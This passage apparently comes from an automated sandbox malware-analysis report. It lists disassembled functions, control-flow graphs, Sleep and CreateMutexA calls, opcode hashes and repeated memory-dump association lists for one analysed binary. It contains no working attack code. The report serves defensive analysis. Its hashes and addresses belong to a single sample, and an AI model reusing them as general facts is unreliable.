                                                                                                                                              • Associated: 00000000.00000002.1720470523.000000000115B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1720487720.000000000115C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1720504494.000000000115D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1720521553.000000000115E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_e50000_file.jbxd
                                                                                                                                              Yara matches
                                                                                                                                              Similarity
                                                                                                                                              • API ID: CreateMutexSleep
                                                                                                                                              • String ID: T2
                                                                                                                                              • API String ID: 1464230837-631260391
                                                                                                                                              • Opcode ID: a25fe7cbcd9ce83776c21da27ad69253a6335242507c784ad92b8343beebe592
                                                                                                                                              • Instruction ID: 126b29a229ffa51d2d9e5a877cad05ba9878a5d9bb7893bee8af0419560777fc
                                                                                                                                              • Opcode Fuzzy Hash: a25fe7cbcd9ce83776c21da27ad69253a6335242507c784ad92b8343beebe592
                                                                                                                                              • Instruction Fuzzy Hash: 32314C716041008FEB08DB78EC85B6DB7A2EBC5319F286B28E814B73D5DB7599848712
                                                                                                                                              Function 00E5A682 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 131sleepsynchronizationCOMMON
                                                                                                                                              Download Yara Rule

                                                                                                                                              Control-flow Graph

                                                                                                                                              • Executed
                                                                                                                                              • Not Executed
                                                                                                                                              control_flow_graph 294 e5a682-e5a6a2 298 e5a6a4-e5a6b0 294->298 299 e5a6d0-e5a6ec 294->299 302 e5a6c6-e5a6cd call e6d663 298->302 303 e5a6b2-e5a6c0 298->303 300 e5a6ee-e5a6fa 299->300 301 e5a71a-e5a739 299->301 304 e5a710-e5a717 call e6d663 300->304 305 e5a6fc-e5a70a 300->305 306 e5a767-e5a916 call e680c0 301->306 307 e5a73b-e5a747 301->307 302->299 303->302 308 e5a949 303->308 304->301 305->304 305->308 312 e5a75d-e5a764 call e6d663 307->312 313 e5a749-e5a757 307->313 315 e5a94e 308->315 316 e5a949 call e86c6a 308->316 312->306 313->308 313->312 317 e5a953-e5a994 Sleep CreateMutexA 315->317 318 e5a94e call e86c6a 315->318 316->315 326 e5a9a7-e5a9a8 317->326 327 e5a996-e5a998 317->327 318->317 327->326 328 e5a99a-e5a9a5 327->328 328->326
                                                                                                                                              APIs
                                                                                                                                              • Sleep.KERNEL32(00000064), ref: 00E5A963
                                                                                                                                              • CreateMutexA.KERNEL32(00000000,00000000,00EB3254), ref: 00E5A981
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.1716556204.0000000000E51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E50000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.1716538378.0000000000E50000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1716556204.0000000000EB2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1716763609.0000000000EB9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1716834012.0000000000EBB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1716855532.0000000000EC5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1716873008.0000000000EC6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1716940538.0000000000EC7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1717449514.0000000001020000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1717571841.0000000001022000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1717729101.0000000001030000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1718123012.0000000001031000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1718322960.0000000001034000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1718322960.000000000103C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1718526093.0000000001040000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1719275382.0000000001041000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1719299270.0000000001042000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1719318091.0000000001044000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1719460485.0000000001045000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1719476233.0000000001046000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1719501305.0000000001057000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1719754002.0000000001058000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1719863677.000000000106E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1719918303.000000000106F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1720025951.0000000001077000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1720052328.0000000001080000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1720079903.00000000010A4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1720099065.00000000010AE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1720115148.00000000010AF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1720130839.00000000010B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1720150882.00000000010B9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1720166422.00000000010BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1720188381.00000000010C1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1720203701.00000000010C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1720219976.00000000010CB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1720235908.00000000010CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1720250464.00000000010D0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1720265532.00000000010D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1720281104.00000000010D2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1720297553.00000000010D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1720311947.00000000010D4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1720328311.00000000010DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1720328311.000000000111A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1720382455.0000000001144000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1720400324.0000000001145000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1720419501.0000000001146000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1720435918.000000000114B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1720452280.000000000114D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1720470523.000000000115B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1720487720.000000000115C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1720504494.000000000115D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1720521553.000000000115E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_e50000_file.jbxd
                                                                                                                                              Yara matches
                                                                                                                                              Similarity
                                                                                                                                              • API ID: CreateMutexSleep
                                                                                                                                              • String ID: T2
                                                                                                                                              • API String ID: 1464230837-631260391
                                                                                                                                              • Opcode ID: 51e03fce919f5af7ddb0eabbf8999f46c8acc84182b8a115accdcfc60eae72f2
                                                                                                                                              • Instruction ID: 3b865052fbf3cbfeb23b1f1f39a252d9649dcdb55353305e6989026414d095d7
                                                                                                                                              • Opcode Fuzzy Hash: 51e03fce919f5af7ddb0eabbf8999f46c8acc84182b8a115accdcfc60eae72f2
                                                                                                                                              • Instruction Fuzzy Hash: CC3148716042408FEB08DB78EC8976DB7A2EBC5315F2CAB28E814B73D5C77559888753
                                                                                                                                              Function 00E59ADC Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 107sleepsynchronizationCOMMON
                                                                                                                                              Download Yara Rule

                                                                                                                                              Control-flow Graph

                                                                                                                                              • Executed
                                                                                                                                              • Not Executed
                                                                                                                                              control_flow_graph 330 e59adc-e59ae8 331 e59afe-e59d91 call e6d663 call e67a00 call e55c10 call e58b30 call e68220 call e67a00 call e55c10 call e58b30 call e68220 330->331 332 e59aea-e59af8 330->332 332->331 333 e5a917 332->333 335 e5a953-e5a994 Sleep CreateMutexA 333->335 336 e5a917 call e86c6a 333->336 341 e5a9a7-e5a9a8 335->341 342 e5a996-e5a998 335->342 336->335 342->341 345 e5a99a-e5a9a5 342->345 345->341
                                                                                                                                              APIs
                                                                                                                                              • Sleep.KERNEL32(00000064), ref: 00E5A963
                                                                                                                                              • CreateMutexA.KERNEL32(00000000,00000000,00EB3254), ref: 00E5A981
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.1716556204.0000000000E51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E50000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.1716538378.0000000000E50000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1716556204.0000000000EB2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1716763609.0000000000EB9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1716834012.0000000000EBB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1716855532.0000000000EC5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1716873008.0000000000EC6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1716940538.0000000000EC7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1717449514.0000000001020000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1717571841.0000000001022000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1717729101.0000000001030000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1718123012.0000000001031000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1718322960.0000000001034000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1718322960.000000000103C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1718526093.0000000001040000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1719275382.0000000001041000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1719299270.0000000001042000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1719318091.0000000001044000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1719460485.0000000001045000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1719476233.0000000001046000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1719501305.0000000001057000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1719754002.0000000001058000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1719863677.000000000106E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1719918303.000000000106F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1720025951.0000000001077000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1720052328.0000000001080000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1720079903.00000000010A4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1720099065.00000000010AE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1720115148.00000000010AF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1720130839.00000000010B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1720150882.00000000010B9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1720166422.00000000010BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1720188381.00000000010C1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1720203701.00000000010C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1720219976.00000000010CB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1720235908.00000000010CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1720250464.00000000010D0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1720265532.00000000010D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1720281104.00000000010D2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1720297553.00000000010D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1720311947.00000000010D4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1720328311.00000000010DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1720328311.000000000111A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1720382455.0000000001144000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1720400324.0000000001145000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1720419501.0000000001146000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1720435918.000000000114B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1720452280.000000000114D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1720470523.000000000115B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1720487720.000000000115C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1720504494.000000000115D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1720521553.000000000115E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_e50000_file.jbxd
                                                                                                                                              Yara matches
                                                                                                                                              Similarity
                                                                                                                                              • API ID: CreateMutexSleep
                                                                                                                                              • String ID: T2
                                                                                                                                              • API String ID: 1464230837-631260391
                                                                                                                                              • Opcode ID: 49a008ca88478b4adc015cdf1fa32aa45c587000bec43ca81404337903e542f5
                                                                                                                                              • Instruction ID: 3a3f8e2580b4a3485c18d09fb294d09f1cc28bfd47f184d2aba57561d7d48519
                                                                                                                                              • Opcode Fuzzy Hash: 49a008ca88478b4adc015cdf1fa32aa45c587000bec43ca81404337903e542f5
                                                                                                                                              • Instruction Fuzzy Hash: 9C2167317442009BFB189B68FC8676DF7A2EBC1315F286B28E808F72D5DB7559888612
                                                                                                                                              Function 00E5A856 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 100sleepsynchronizationCOMMON
                                                                                                                                              Download Yara Rule

                                                                                                                                              Control-flow Graph

                                                                                                                                              • Executed
                                                                                                                                              • Not Executed
                                                                                                                                              control_flow_graph 398 e5a856-e5a86e 399 e5a870-e5a87c 398->399 400 e5a89c-e5a89e 398->400 401 e5a892-e5a899 call e6d663 399->401 402 e5a87e-e5a88c 399->402 403 e5a8a0-e5a8a7 400->403 404 e5a8a9-e5a8b1 call e57d30 400->404 401->400 402->401 406 e5a94e 402->406 408 e5a8eb-e5a916 call e680c0 403->408 414 e5a8e4-e5a8e6 404->414 415 e5a8b3-e5a8bb call e57d30 404->415 410 e5a953-e5a987 Sleep CreateMutexA 406->410 411 e5a94e call e86c6a 406->411 418 e5a98e-e5a994 410->418 411->410 414->408 415->414 422 e5a8bd-e5a8c5 call e57d30 415->422 420 e5a9a7-e5a9a8 418->420 421 e5a996-e5a998 418->421 421->420 423 e5a99a-e5a9a5 421->423 422->414 427 e5a8c7-e5a8cf call e57d30 422->427 423->420 427->414 430 e5a8d1-e5a8d9 call e57d30 427->430 430->414 433 e5a8db-e5a8e2 430->433 433->408
                                                                                                                                              APIs
                                                                                                                                              • Sleep.KERNEL32(00000064), ref: 00E5A963
                                                                                                                                              • CreateMutexA.KERNEL32(00000000,00000000,00EB3254), ref: 00E5A981
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.1716556204.0000000000E51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E50000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.1716538378.0000000000E50000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1716556204.0000000000EB2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1716763609.0000000000EB9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1716834012.0000000000EBB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1716855532.0000000000EC5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1716873008.0000000000EC6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1716940538.0000000000EC7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1717449514.0000000001020000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1717571841.0000000001022000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1717729101.0000000001030000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1718123012.0000000001031000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1718322960.0000000001034000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1718322960.000000000103C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1718526093.0000000001040000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1719275382.0000000001041000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1719299270.0000000001042000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1719318091.0000000001044000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1719460485.0000000001045000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1719476233.0000000001046000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1719501305.0000000001057000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1719754002.0000000001058000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1719863677.000000000106E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1719918303.000000000106F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1720025951.0000000001077000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1720052328.0000000001080000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1720079903.00000000010A4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1720099065.00000000010AE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1720115148.00000000010AF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1720130839.00000000010B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1720150882.00000000010B9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1720166422.00000000010BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1720188381.00000000010C1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1720203701.00000000010C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1720219976.00000000010CB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1720235908.00000000010CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1720250464.00000000010D0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1720265532.00000000010D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1720281104.00000000010D2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1720297553.00000000010D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1720311947.00000000010D4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1720328311.00000000010DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1720328311.000000000111A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1720382455.0000000001144000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1720400324.0000000001145000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1720419501.0000000001146000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1720435918.000000000114B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1720452280.000000000114D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1720470523.000000000115B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1720487720.000000000115C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1720504494.000000000115D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1720521553.000000000115E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_e50000_file.jbxd
                                                                                                                                              Yara matches
                                                                                                                                              Similarity
                                                                                                                                              • API ID: CreateMutexSleep
                                                                                                                                              • String ID: T2
                                                                                                                                              • API String ID: 1464230837-631260391
                                                                                                                                              • Opcode ID: 39f814376c3f7e4db96592de50d1a5200e20999d651161a71c9830252528135e
                                                                                                                                              • Instruction ID: 1385aba8a81c551276375c2a878be293a1f6eaf2e26ce11dd4ed911c2436525b
                                                                                                                                              • Opcode Fuzzy Hash: 39f814376c3f7e4db96592de50d1a5200e20999d651161a71c9830252528135e
                                                                                                                                              • Instruction Fuzzy Hash: AC213B702442008EFB286778EC5A72DF7929B81306F2C3E25ED44B63D1CA7654494253
                                                                                                                                              Function 00E5A34F Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 100sleepsynchronizationCOMMON
                                                                                                                                              Download Yara Rule

                                                                                                                                              Control-flow Graph

                                                                                                                                              • Executed
                                                                                                                                              • Not Executed
                                                                                                                                              control_flow_graph 375 e5a34f-e5a35b 376 e5a371-e5a39a call e6d663 375->376 377 e5a35d-e5a36b 375->377 383 e5a39c-e5a3a8 376->383 384 e5a3c8-e5a916 call e680c0 376->384 377->376 378 e5a93a 377->378 380 e5a953-e5a994 Sleep CreateMutexA 378->380 381 e5a93a call e86c6a 378->381 391 e5a9a7-e5a9a8 380->391 392 e5a996-e5a998 380->392 381->380 387 e5a3be-e5a3c5 call e6d663 383->387 388 e5a3aa-e5a3b8 383->388 387->384 388->378 388->387 392->391 395 e5a99a-e5a9a5 392->395 395->391
                                                                                                                                              APIs
                                                                                                                                              • Sleep.KERNEL32(00000064), ref: 00E5A963
                                                                                                                                              • CreateMutexA.KERNEL32(00000000,00000000,00EB3254), ref: 00E5A981
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.1716556204.0000000000E51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E50000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.1716538378.0000000000E50000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1716556204.0000000000EB2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1716763609.0000000000EB9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1716834012.0000000000EBB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1716855532.0000000000EC5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1716873008.0000000000EC6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1716940538.0000000000EC7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1717449514.0000000001020000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1717571841.0000000001022000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1717729101.0000000001030000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1718123012.0000000001031000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1718322960.0000000001034000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1718322960.000000000103C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1718526093.0000000001040000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1719275382.0000000001041000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1719299270.0000000001042000.00000080.00000001.01000000.00000003.sdmpDownload File
